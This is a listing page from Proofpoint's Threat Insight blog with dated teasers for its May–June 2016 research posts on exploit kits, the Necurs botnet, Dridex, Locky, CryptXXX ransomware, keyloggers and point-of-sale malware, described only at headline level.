Threat Insight

Cybersecurity research and commentary on malware, user actions, and other threats to information security
June 16, 2016

Is Angler EK Sleeping with the Fishes? Neutrino exploit kit now distributing most CryptXXX

Proofpoint Staff

Proofpoint researchers have been tracking the relatively sudden shutdown of several elements of the advanced threat ecosystem, including the Angler exploit kit, which now appears to extend well beyond the disruption of the Necurs botnet we covered last week.

June 09, 2016

It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution

Proofpoint Staff

Proofpoint researchers take a look at the effects of an apparent outage in the massive Necurs botnet on two of the biggest names in malware: Dridex and Locky.

June 02, 2016

Malicious Macros Add Sandbox Evasion Techniques to Distribute New Dridex

Proofpoint Staff

Proofpoint researchers track new campaigns from a familiar actor using evasive macros and distributing a new Dridex sub-botnet targeting Swiss banking institutions.

June 01, 2016

CryptXXX Ransomware Learns the Samba, Other New Tricks With Version 3.100

Proofpoint Staff

With its latest version, detected last week by Proofpoint researchers, CryptXXX breaks the currently available decryption tool and adds new capabilities to encrypt shared network resources, among other updates.

May 27, 2016

Two Threats For the Price of One: Credential Phishing Leads to iSpy Keylogger

Proofpoint Staff

Proofpoint researchers recently detected a phishing campaign that ultimately led recipients to download and install the iSpy keylogger.

May 26, 2016

Locky Ransomware Actors Turning To XORed JavaScript to Bypass Traditional Defenses

Proofpoint Staff

Proofpoint researchers have observed certain threat actors distributing Locky with JavaScript attachments using XOR obfuscation to conceal the malware they are distributing, adapting to increasing awareness of malicious JavaScript attachments to email.

May 24, 2016

Beware the JavaScript - Malicious Email Campaigns With .js Attachments Explode

Proofpoint Staff

Proofpoint researchers have been tracking what appears to be the "next big thing" in email malware distribution - JavaScript attachments by the hundreds of millions.

May 12, 2016

Hancitor and Ruckguv Reappear, Updated and With Vawtrak On Deck

Axel F, Matthew Mesa

Proofpoint researchers analyze two updated malware downloaders that have reappeared after several months hiatus and profile one threat actor experimenting with various loaders to distribute Vawtrak.

May 10, 2016

Setting Sights On Retail: AbaddonPOS Now Targeting Specific POS Software

Matthew Mesa, Darien Huss

Proofpoint researchers track an updated point-of-sale malware called AbaddonPOS and loader being distributed in targeted, personalized emails to US retailers.

May 09, 2016

CryptXXX 2.0: Ransomware Authors Strike Back Against Free Decryption Tool

Proofpoint Staff

Proofpoint researchers have been tracking Version 2.00x of the CryptXXX ransomware. The latest iteration, version 2.006, breaks the freely available decryption tool for CryptXXX.


Stay Connected